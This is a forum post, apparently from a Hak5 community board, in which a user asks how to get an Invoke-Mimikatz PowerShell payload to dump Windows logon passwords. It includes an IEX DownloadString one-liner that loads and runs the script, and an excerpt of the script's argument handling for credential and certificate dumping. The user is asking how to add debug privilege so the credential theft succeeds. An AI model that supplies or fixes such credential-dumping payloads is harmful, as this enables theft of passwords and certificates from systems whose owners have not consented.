Jump to content

Evil twin duck powershell script help


derjussar
 Share

Recommended Posts

Afternoon all -

I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it.  Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below

powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds"

Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

When I read thru the powershell script, it's missing the privilege line: "privilege::debug"

The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK)

How do I run the priv command and then the dump passwords command?


	if ($PsCmdlet.ParameterSetName -ieq "DumpCreds")
	{
        $ExeArgs = "sekurlsa::logonpasswords Exit"
	}
    elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts")
    {
        $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit"
    }
    else
    {
        $ExeArgs = $Command
    }

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...